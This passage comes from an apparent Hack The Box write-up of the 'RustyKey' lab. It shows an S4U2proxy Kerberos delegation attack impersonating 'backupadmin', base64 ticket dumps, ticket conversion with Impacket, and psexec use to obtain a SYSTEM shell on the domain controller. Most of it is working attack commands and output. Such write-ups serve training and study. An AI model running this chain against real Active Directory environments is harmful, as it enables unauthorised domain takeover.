doIFtjCCBbKgAwIBBaEDAgEWooIEzzCCBMthggTHMIIEw6ADAgEFoQ4bDFJVU1RZS0VZLkhUQqIaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMySjggSOMIIEiqADAgEXoQMCAQSiggR8BIIEeEvkaK30QJCJN081Tf7T20kugVg+wo0TGqewGi7SnuVQxmu4fJCSzIWASm2+CY473IchmPK6DIjLdtkWg6LLxbl6BjSMdn6BON/1JtPghb9KO5fS2Tb3FbMeg7ryXL6co2hGSjcFw17WPyO+mKr/Cg+MO/NAIB5MrT4ylEw4FUwu5wQxeOjXd+tgdiYZMfZ3hMItQZSvTuGGVzWLdXWJbpMegonmOlvTcm+s1I4zdC5e2CiazQqgT/7OFRBWTlGF54lI0rviYaHZIyWkTAx7KRLG1ZDLlHqWWLFpyeB2SEd3LxcD8h84ciT4XOEDSDAUxvvbTv5FfuTIeMDWC6V7W9DuUzbYS4VAbtMa5vS1iZxHEElqPibZw65L/uLJD/5RJfNzglmNRR43tn5NZnYbzBkjZe7MVpneaV/GHorZKYKjJVUCajWmrF/gcpqg1a0lkgxFfQDGUdSr0BK95ueMKqJONIOqkFwFSswxmOUAv2j3sJ0+fejJVkyWOPvR5iM54Rbd8EsYeU4fVI1mMzQTCz59RAVDFzb/IIjKpx224gWM55Y5j/UIQ13MJ5yDM3LVYrKu9o43D/rpHR22bUZG9oXeRLrSSXi8+2KPSUR5mDoYi8ehaSJxmIbNwSycjI4EqfjdifWgS1j/o3+9O17boK6SlyhaZAqNk+ARxYMj5itqYgc0LBaiAsA6zpXyubFQ58J9PcCVFHToi/Bf2iVbkKxE+pP2kIIzyniw+YGNLLzlPLAPI1CqtAYnrr1HIZ61hl/JBKEk9qzXeumXrWMD6tKqKjN2av/NxynLYWbq1KIUPYZNmYqF1H/pdUQYUfdoYp3vLVvFXTPrkYqvY41JAqnuFZ3Fk0PQaiyMBtPOuy7rsz3X7mTj2+hsOMQNoxPCyiSFA654KTlEv8xPbEJOPe3vjyBsPYTVRaLYXGVf+hL3sM8XU6Y49LIuO3E5wUd6fruPFs9y0Z5nwPgnTpEqhjwDhXziQIm0LWr4xzdK7yom7QDgs2jC/WhRCYOBObfCaxERha3BMEoymObyW+RZrcVeXNcgiNMWEcr5re8S3KbsBPuEPVOitSiAdWLpTwrQTy+d6yUbAcMWk6c+Y8jFiospjfaSNM+n2WeKmPTmdfxUsXKp9LhYJgiJ39pEqtMEm3SiJ/B/C9lAo8HLcLFtUDaZqEluHOlH/8QAXq7Fp4tE0qas+wNtug9+y7W2YGcza1nIY35tF0zD0JHDIlod+zH7sQbQUXixesn1TdTWpSqbEH9bRwqAfVmnBEgPUY5jAI05ygiwpxQOZcm9f/xjZjeajgtWOoZYPnNanNyRJYCxsytob2QH7/4Cq8HvvrCvEthV0EHPnp0dgrzXSRopexoqKaTo8+s5qxy98EngD16dQLI/AuT+kAuvJJu4bXankA+TKDMmFq+OhjYrJplOM9DCtQ6tO4XAYjsPQ2YRaRRV4i6oEr0XElAzqAbAhb5R8UWyNj9FHuo4sHVmcu5nbc23kQ4cOZrC7PDWoqqa1dZQtOE3qQvWwP6jgdIwgc+gAwIBAKKBxwSBxH2BwTCBvqCBuzCBuDCBtaAbMBmgAwIBF6ESBBAS2vRDwHKZtIOEWGm/aQZkoQ4bDFJVU1RZS0VZLkhUQqIYMBagAwIBCqEPMA0bC2JhY2t1cGFkbWluowcDBQBAoQAApREYDzIwMjUwNzAzMjIyODMzWqYRGA8yMDI1MDcwNDA4MjgzM1qnERgPMjAyNTA3MTAyMjI4MzNaqA4bDFJVU1RZS0VZLkhUQqkaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMyQ= [*] Impersonating user 'backupadmin' to target SPN 'cifs/DC.rustykey.htb' [*] Building S4U2proxy request for service: 'cifs/DC.rustykey.htb' [*] Using domain controller: dc.rustykey.htb (fe80::d98:ec14:263a:b635%11) [*] Sending S4U2proxy request to domain controller fe80::d98:ec14:263a:b635%11:88 [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN 'cifs/DC.rustykey.htb': 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 PS C:\\tem> ``` #### System Shell We copy and paste the Base64-encoded ticket, decode it and redirect the output to a file: ```java ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ echo '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' | base64 -d > backupadmin.kirbi ``` We then use the `ticketConverter.py` from the **Impacket** suite to convert the ticket into .ccache format: ```java └─$ impacket-ticketConverter backupadmin.kirbi backupadmin.ccache Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] converting kirbi to ccache... [+] done ``` We export the ticket and use the `psexec.py` from the **Impacket** suite to get a SYSTEM shell on the domain controller: ```java └─$ export KRB5CCNAME=backupadmin.ccache ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ impacket-psexec RUSTYKEY.HTB/backupadmin@DC.RUSTYKEY.HTB -k -no-pass Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on DC.RUSTYKEY.HTB..... [*] Found writable share ADMIN$ [*] Uploading file tmhSOAtU.exe [*] Opening SVCManager on DC.RUSTYKEY.HTB..... [*] Creating service ycKx on DC.RUSTYKEY.HTB..... [*] Starting service ycKx..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.7434] (c) 2018 Microsoft Corporation. All rights reserved. C:\\Windows\\system32> whoami nt authority\\system C:\\Windows\\system32> ``` and we have `root.txt` ```java Directory of C:\\Users\\Administrator\\Desktop 06/24/2025 10:00 AM . 06/24/2025 10:00 AM .. 07/02/2025 03:32 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 2,785,824,768 bytes free ```